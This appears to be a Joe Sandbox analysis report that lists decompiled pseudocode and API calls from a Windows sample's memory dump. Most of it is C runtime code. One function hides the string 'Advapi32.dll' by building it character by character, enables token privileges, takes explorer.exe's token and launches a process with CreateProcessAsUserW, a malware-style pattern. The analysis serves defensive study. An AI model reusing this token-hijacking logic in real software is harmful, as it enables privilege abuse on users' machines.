GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0024E8F0,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0024E6C3
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0024E8F0,00000000,00000000,?,00000001,?,?,?,?), ref: 0024E746
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0024E8F0,?,0024E8F0,00000000,00000000,?,00000001,?,?,?,?), ref: 0024E7D9
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0024E8F0,00000000,00000000,?,00000001,?,?,?,?), ref: 0024E7F0

Part of subcall function 00246F07: RtlAllocateHeap.NTDLL(00000000,?,?,?,002429E9,?,?,002410DD,00000010), ref: 00246F39

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0024E8F0,00000000,00000000,?,00000001,?,?,?,?), ref: 0024E86C

Part of subcall function 0024ACEC: CompareStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0024E8F0,?,00000000,?,?,0024E88F,?,?,?,0024E8F0), ref: 0024AD49

__freea.LIBCMT ref: 0024E897
__freea.LIBCMT ref: 0024E8A3

Part of subcall function 00243541: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00243585

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024F52D, Relevance: 10.7, APIs: 7, Instructions: 152
file

C-Code - Quality: 73%

			E0024F52D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x25b018; // 0x6083b07a
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x2619b0 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x2619b0 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E0024B36C(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x2619b0 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x2619b0 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x2619b0 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00247D43( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00247D43();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00243541(_v8 ^ _t136);
			}

0x0024f535
0x0024f53c
0x0024f53f
0x0024f547
0x0024f54b
0x0024f557
0x0024f55a
0x0024f55d
0x0024f564
0x0024f56c
0x0024f56f
0x0024f575
0x0024f57b
0x0024f580
0x0024f582
0x0024f585
0x0024f58a
0x0024f594
0x0024f59b
0x0024f59e
0x0024f5a5
0x0024f5ac
0x0024f5d8
0x0024f5fe
0x0024f600
0x00000000
0x0024f5da
0x0024f5dd
0x0024f6a4
0x0024f6b0
0x0024f6bb
0x0024f6c0
0x0024f5e3
0x0024f5ea
0x0024f5ef
0x0024f5f5
0x0024f5fb
0x00000000
0x0024f5fb
0x0024f5f5
0x0024f5dd
0x0024f5ae
0x0024f5b2
0x0024f5b5
0x0024f5bb
0x0024f5bd
0x0024f5c0
0x0024f5c4
0x0024f601
0x0024f604
0x0024f605
0x0024f60a
0x0024f610
0x0024f616
0x0024f625
0x0024f62b
0x0024f631
0x0024f636
0x0024f652
0x0024f6c5
0x0024f6cb
0x0024f654
0x0024f65c
0x0024f665
0x0024f66b
0x00000000
0x0024f66d
0x0024f66f
0x0024f672
0x0024f68b
0x00000000
0x0024f68d
0x0024f691
0x0024f693
0x0024f696
0x00000000
0x0024f696
0x0024f691
0x0024f68b
0x0024f66b
0x0024f665
0x0024f652
0x0024f636
0x0024f610
0x00000000
0x0024f699
0x0024f699
0x0024f6cd
0x0024f6df

APIs

GetConsoleCP.KERNEL32 ref: 0024F56F
__Stoull.NTSTC_LIBCMT ref: 0024F5EA
__Stoull.NTSTC_LIBCMT ref: 0024F605
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0024F62B
WriteFile.KERNEL32(?,00000000,00000000,0024FCA2,00000000), ref: 0024F64A
WriteFile.KERNEL32(?,00000000,00000001,0024FCA2,00000000), ref: 0024F683
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0024FCA2,00000000,00000000,00000000,00000000,00000000,?), ref: 0024F6C5

Part of subcall function 00243541: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00243585

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 002412D3, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 88

C-Code - Quality: 80%

			E002412D3(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* __esi;
				void* _t56;
				void* _t60;
				intOrPtr _t61;
				signed int _t62;
				signed int _t67;
				signed int _t75;
				void* _t83;
				void* _t84;
				intOrPtr* _t85;

				_t84 = __ecx;
				 *((intOrPtr*)(__ecx + 8)) = 1;
				_t56 = HeapAlloc(GetProcessHeap(), 8, 4);
				 *(_t84 + 4) = _t56;
				if(_t56 != 0) {
					_t75 = 0;
					__eflags =  *(_t84 + 8);
					if(__eflags <= 0) {
						L10:
						return 1;
					}
					_v12 = 0x25b7dc;
					_v8 = 0x25b7b0;
					_push(_t85);
					do {
						_t85 = E002429BD(_t83, _t85, __eflags, 0x28);
						 *_t85 = 0;
						 *(_t85 + 4) = 0;
						 *((intOrPtr*)(_t85 + 8)) = 0;
						 *((intOrPtr*)(_t85 + 0xc)) = 0;
						 *((intOrPtr*)(_t85 + 0x10)) = 0;
						 *(_t85 + 0x14) = 0;
						_t60 = E00241063(_t84, _v8);
						__eflags =  *(_t85 + 0x14);
						_v16 = _t60;
						if( *(_t85 + 0x14) != 0) {
							HeapFree(GetProcessHeap(), 8,  *(_t85 + 0x14));
							_t60 = _v16;
						}
						 *(_t85 + 0x14) = _t60;
						_t61 = E00241063(_t84, _v12);
						__eflags =  *(0x259750 + _t75 * 4);
						 *((intOrPtr*)(_t85 + 0x10)) = _t61;
						_t62 =  *(0x259760 + _t75 * 4);
						 *(_t85 + 0x24) = _t62;
						 *((char*)(_t85 + 0x18)) = _t62 & 0xffffff00 |  *(0x259750 + _t75 * 4) != 0x00000000;
						 *((intOrPtr*)(_t85 + 0x20)) =  *((intOrPtr*)(0x261e30 + _t75 * 4));
						 *((intOrPtr*)(_t85 + 0xc)) =  *((intOrPtr*)(0x25974c + _t75 * 4));
						 *((intOrPtr*)(_t85 + 8)) =  *((intOrPtr*)(0x259748 + _t75 * 4));
						_t67 =  *(0x259744 + _t75 * 4);
						__eflags = _t67;
						if(_t67 != 0) {
							 *(_t85 + 4) = _t67;
						}
						__eflags =  *(0x261e2c + _t75 * 4);
						_push(_t85);
						 *((char*)(_t85 + 0x19)) = _t67 & 0xffffff00 |  *(0x261e2c + _t75 * 4) != 0x00000000;
						 *((intOrPtr*)(_t85 + 0x1c)) =  *((intOrPtr*)(0x261e34 + _t75 * 4));
						E00241000(_t84);
						_v8 = _v8 + 0x2c;
						_v12 = _v12 + 0x34;
						 *((intOrPtr*)( *(_t84 + 4) + _t75 * 4)) = _t85;
						_t75 = _t75 + 1;
						__eflags = _t75 -  *(_t84 + 8);
					} while (__eflags < 0);
					goto L10;
				}
				return 0;
			}

0x002412da
0x002412e0
0x002412ee
0x002412f4
0x002412f9
0x00241303
0x00241305
0x00241308
0x002413ef
0x00000000
0x002413f1
0x0024130e
0x00241315
0x0024131c
0x0024131d
0x00241324
0x0024132e
0x00241330
0x00241333
0x00241336
0x00241339
0x0024133c
0x0024133f
0x00241344
0x00241348
0x0024134b
0x00241359
0x0024135f
0x0024135f
0x00241367
0x0024136a
0x0024136f
0x00241377
0x0024137a
0x00241381
0x00241387
0x00241391
0x0024139b
0x002413a5
0x002413a8
0x002413af
0x002413b1
0x002413b3
0x002413b3
0x002413b6
0x002413c0
0x002413c4
0x002413ce
0x002413d1
0x002413d9
0x002413dd
0x002413e1
0x002413e4
0x002413e5
0x002413e5
0x00000000
0x002413ee
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000004), ref: 002412E7
HeapAlloc.KERNEL32(00000000), ref: 002412EE

Part of subcall function 00241063: GetProcessHeap.KERNEL32(00000008,00000104), ref: 00241071
Part of subcall function 00241063: HeapAlloc.KERNEL32(00000000), ref: 00241078

GetProcessHeap.KERNEL32(00000008,?), ref: 00241352
HeapFree.KERNEL32(00000000), ref: 00241359

Strings

4, xrefs: 002413DD
,, xrefs: 002413D9

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00246664, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38library

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00246659,00000000,?,002465F9,00000000,00259EA0,0000000C,0024670C,00000000,00000002), ref: 00246684
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,00246659,00000000,?,002465F9,00000000,00259EA0,0000000C,0024670C,00000000,00000002), ref: 00246697
FreeLibrary.KERNEL32(00000000,?,?,?,00246659,00000000,?,002465F9,00000000,00259EA0,0000000C,0024670C,00000000,00000002), ref: 002466BA

Part of subcall function 00243541: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00243585

Strings

mscoree.dll, xrefs: 0024667D
CorExitProcess, xrefs: 0024668F

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00241B02, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123
library

C-Code - Quality: 37%

			E00241B02(void* __ecx, void* __eflags) {
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v36;
				intOrPtr _v40;
				char _v56;
				char _v72;
				char _v120;
				char _v124;
				char _v128;
				char _v148;
				char _v2228;
				void* __edi;
				short _t41;
				short _t42;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t49;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				signed int _t55;
				void* _t58;
				short _t60;
				char _t68;
				void* _t69;

				_t69 = __ecx;
				E00241957();
				_t58 = E00241C3D();
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t68 = 0x44;
				E00243C20(_t68,  &_v148, 0, _t68);
				_v148 = _t68;
				E00243C20(_t68,  &_v2228, 0, 0x820);
				_push(_t69);
				_push(0x410);
				_push( &_v2228);
				E002418DC();
				E00243C20(_t68,  &_v148, 0, _t68);
				asm("movaps xmm0, [0x259830]");
				_v40 = 0x57726573;
				_v120 = 0;
				_v124 = 0;
				_t41 = 0x41;
				_t60 = 0x64;
				_v32 = _t41;
				_t42 = 0x76;
				_v28 = _t42;
				_t43 = 0x61;
				_v26 = _t43;
				_t44 = 0x70;
				_v24 = _t44;
				_t45 = 0x69;
				_v22 = _t45;
				_t46 = 0x33;
				_v20 = _t46;
				_t47 = 0x32;
				_v18 = _t47;
				_t48 = 0x2e;
				_v16 = _t48;
				_t49 = 0x6c;
				_v12 = _t49;
				_v10 = _t49;
				_v128 = 0;
				_v30 = _t60;
				_v14 = _t60;
				_v8 = 0;
				asm("movups [ebp-0x34], xmm0");
				_v36 = 0;
				_t52 = LoadLibraryW( &_v32);
				if(_t52 != 0) {
					_t53 = GetProcAddress(_t52,  &_v56);
					if(_t53 == 0) {
						goto L1;
					}
					_t55 =  *_t53(_t58, 0,  &_v2228, 0, 0, 0, 0x20, 0, 0,  &_v148,  &_v72);
					asm("sbb eax, eax");
					return  ~_t55 + 1;
				}
				L1:
				return 0;
			}

0x00241b0e
0x00241b10
0x00241b1a
0x00241b21
0x00241b24
0x00241b25
0x00241b26
0x00241b2d
0x00241b32
0x00241b3a
0x00241b4e
0x00241b5c
0x00241b5d
0x00241b62
0x00241b63
0x00241b75
0x00241b7d
0x00241b86
0x00241b8d
0x00241b90
0x00241b95
0x00241b98
0x00241b9b
0x00241b9f
0x00241ba2
0x00241ba6
0x00241ba9
0x00241bad
0x00241bb0
0x00241bb4
0x00241bb7
0x00241bbb
0x00241bbe
0x00241bc2
0x00241bc5
0x00241bc9
0x00241bca
0x00241bd0
0x00241bd1
0x00241bd5
0x00241bdb
0x00241bde
0x00241be2
0x00241be6
0x00241bea
0x00241bf1
0x00241bf5
0x00241bfd
0x00241c08
0x00241c10
0x00000000
0x00000000
0x00241c2f
0x00241c33
0x00000000
0x00241c35
0x00241bff
0x00000000

APIs

Part of subcall function 00241957: LoadLibraryW.KERNEL32(?), ref: 002419D6
Part of subcall function 00241957: GetProcAddress.KERNEL32(00000000,?,?,?,?), ref: 002419F1
Part of subcall function 00241957: GetCurrentProcess.KERNEL32(000F01FF,00000000,?,?,?), ref: 002419FE
Part of subcall function 00241957: LoadLibraryW.KERNEL32(?), ref: 00241A77
Part of subcall function 00241957: GetProcAddress.KERNEL32(00000000,?,?,?,?), ref: 00241A86
Part of subcall function 00241957: AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,00000000,00000000,?,?,?), ref: 00241AC4
Part of subcall function 00241957: AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,00000000,00000000,?,?,?), ref: 00241AF7

Part of subcall function 00241C3D: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00241C50
Part of subcall function 00241C3D: Process32FirstW.KERNEL32(00000000,?), ref: 00241C79
Part of subcall function 00241C3D: lstrcmpiW.KERNEL32(explorer.exe,?,?,?), ref: 00241C8D
Part of subcall function 00241C3D: Process32NextW.KERNEL32(00000000,0000022C), ref: 00241C9F
Part of subcall function 00241C3D: CloseHandle.KERNEL32(00000000), ref: 00241CB5
Part of subcall function 00241C3D: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?), ref: 00241CC1
Part of subcall function 00241C3D: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?), ref: 00241CD8
Part of subcall function 00241C3D: CloseHandle.KERNEL32(00000000), ref: 00241CE3
Part of subcall function 00241C3D: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00241CE9
Part of subcall function 00241C3D: CloseHandle.KERNEL32(00000000), ref: 00241D02

LoadLibraryW.KERNEL32(?), ref: 00241BF5
GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00241C08

Strings

CreateProcessAsULookupPrivilegeVOpenProcessToken, xrefs: 00241B7D
serW, xrefs: 00241B86

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024B619, Relevance: 6.1, APIs: 4, Instructions: 110

C-Code - Quality: 81%

			E0024B619(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x25b018; // 0x6083b07a
				_v8 = _t34 ^ _t70;
				E00244842(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0xe9e85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00243541(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00243C20(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E0024B736(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00246F07(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00252260();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x0024b621
0x0024b628
0x0024b634
0x0024b639
0x0024b63e
0x0024b643
0x0024b643
0x0024b646
0x0024b648
0x0024b648
0x0024b64d
0x0024b666
0x0024b66c
0x0024b671
0x0024b710
0x0024b714
0x0024b719
0x0024b719
0x0024b735
0x0024b735
0x0024b677
0x0024b67f
0x0024b683
0x0024b6cf
0x0024b6d1
0x0024b6d3
0x0024b6d8
0x0024b6ef
0x0024b6f7
0x0024b707
0x0024b707
0x0024b6f7
0x0024b709
0x0024b70a
0x00000000
0x0024b70f
0x0024b68a
0x0024b68c
0x0024b68e
0x0024b696
0x0024b6b3
0x0024b6bd
0x0024b6c2
0x00000000
0x00000000
0x0024b6c4
0x0024b6ca
0x0024b6ca
0x00000000
0x0024b6ca
0x0024b69a
0x0024b69e
0x0024b6a3
0x0024b6a7
0x00000000
0x00000000
0x0024b6a9
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,E9E85006,002449A0,00000000,00000000,002451CE,?,002451CE,?,00000001,002449A0,E9E85006,00000001,002451CE,002451CE), ref: 0024B666

Part of subcall function 00246F07: RtlAllocateHeap.NTDLL(00000000,?,?,?,002429E9,?,?,002410DD,00000010), ref: 00246F39

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0024B6EF
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0024B701
__freea.LIBCMT ref: 0024B70A

Part of subcall function 00243541: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00243585

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024621E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63

C-Code - Quality: 83%

			E0024621E(signed int __eax, void* __ecx, void* __edx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				void* _t16;
				short** _t17;
				char* _t20;
				void* _t21;

				_t16 = __edx;
				_t13 = __ecx;
				_t17 =  *0x261954; // 0x586768
				if(_t17 != 0) {
					_t10 = 0;
					while( *_t17 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t17, 0xffffffff, _t10, _t10, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t20 = E00246F55(_t13, _t11, 1);
							_pop(_t13);
							if(_t20 == 0) {
								L10:
								_t2 = E00246ECD(_t20);
								goto L11;
							} else {
								_t10 = 0;
								if(WideCharToMultiByte(0, 0,  *_t17, 0xffffffff, _t20, _t11, 0, 0) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t20);
									E0024ABA5(_t16);
									E00246ECD(0);
									_t21 = _t21 + 0xc;
									_t17 =  &(_t17[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}

0x0024621e
0x0024621e
0x00246221
0x00246229
0x00246232
0x00246287
0x00246240
0x00246246
0x0024624a
0x00246298
0x00246298
0x0024624c
0x00246254
0x00246257
0x0024625a
0x00246291
0x00246292
0x00000000
0x0024625c
0x00246266
0x00246272
0x00000000
0x00246274
0x00246274
0x00246275
0x00246276
0x0024627c
0x00246281
0x00246284
0x00000000
0x00246284
0x00246272
0x0024625a
0x0024628d
0x00246290
0x00000000
0x00246290
0x0024628b
0x00000000
0x0024622b
0x0024622f
0x0024622f
0x00000000

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00586768,000000FF,00000000,00000000,00000000,00000000,?,?,?,00245F3A), ref: 00246240

Part of subcall function 00246F55: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00248462,00000001,00000364,?,?,?,00247BF4,00246F4A,?,?,002429E9,?), ref: 00246F96

WideCharToMultiByte.KERNEL32(00000000,00000000,00586768,000000FF,00000000,00000000,00000000,00000000,?,?,?,00245F3A), ref: 0024626A

Part of subcall function 00246ECD: HeapFree.KERNEL32(00000000,00000000), ref: 00246EE3
Part of subcall function 00246ECD: GetLastError.KERNEL32(?,?,0024B527,?,00000000,?,00000000,?,0024B54E,?,00000007,?,?,0024B96B,?,?), ref: 00246EF5

Strings

hgX, xrefs: 00246221

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00243B68, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45

C-Code - Quality: 100%

			E00243B68(intOrPtr* _a4, char _a8) {
				signed char* _v8;
				intOrPtr _v12;
				char _v16;
				long _v20;
				long _v32;
				void _v36;
				DWORD* _t19;
				intOrPtr _t20;
				intOrPtr* _t22;
				signed int _t23;
				intOrPtr* _t26;
				signed char* _t31;

				_t22 = _a4;
				_t23 = 8;
				memcpy( &_v36, 0x254210, _t23 << 2);
				_t4 =  &_a8; // 0x242d4b
				_t31 =  *_t4;
				if(_t31 != 0 && ( *_t31 & 0x00000010) != 0) {
					_t26 =  *_t22 - 4;
					_t20 =  *_t26;
					_t31 =  *(_t20 + 0x18);
					L0024332D();
					 *((intOrPtr*)( *((intOrPtr*)(_t20 + 0x20))))(_t26);
				}
				_v12 = _t22;
				_v8 = _t31;
				if(_t31 != 0 && ( *_t31 & 0x00000008) != 0) {
					_v16 = 0x1994000;
				}
				_t14 =  &_v16; // 0x242d4b
				_t19 = _t14;
				RaiseException(_v36, _v32, _v20, _t19);
				return _t19;
			}

0x00243b6f
0x00243b76
0x00243b7f
0x00243b81
0x00243b81
0x00243b86
0x00243b8f
0x00243b93
0x00243b9a
0x00243b9d
0x00243ba2
0x00243ba2
0x00243ba4
0x00243ba7
0x00243bac
0x00243bb3
0x00243bb3
0x00243bba
0x00243bba
0x00243bc7
0x00243bd3

APIs

RaiseException.KERNEL32(?,?,?,K-$,?,?,?,?,?,?,?,?,00242D4B,?,00259D8C), ref: 00243BC7

Strings

K-$, xrefs: 00243BBA, 00243BBD
K-$, xrefs: 00243B81

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024C4BD, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36

C-Code - Quality: 100%

			E0024C4BD(void* __ecx, signed short _a4, signed short _a8) {
				short _v8;
				short _v12;
				signed short _t10;
				signed int _t16;
				intOrPtr _t18;

				_t10 = _a4;
				if(_t10 != 0xffff) {
					if(_t10 >= 0x100) {
						_v12 = _t10;
						_v8 = 0;
						if(GetStringTypeW(1,  &_v12, 1,  &_v8) == 0) {
							goto L1;
						}
						_t16 = _v8 & 0x0000ffff;
						L6:
						return _t16 & _a8 & 0x0000ffff;
					}
					_t18 =  *0x25b6dc; // 0x25584a
					_t16 =  *(_t18 + (_t10 & 0x0000ffff) * 2) & 0x0000ffff;
					goto L6;
				}
				L1:
				return 0;
			}

0x0024c4c4
0x0024c4d0
0x0024c4de
0x0024c4ee
0x0024c4f4
0x0024c50c
0x00000000
0x00000000
0x0024c50e
0x0024c512
0x00000000
0x0024c516
0x0024c4e3
0x0024c4e8
0x00000000
0x0024c4e8
0x0024c4d2
0x00000000

APIs

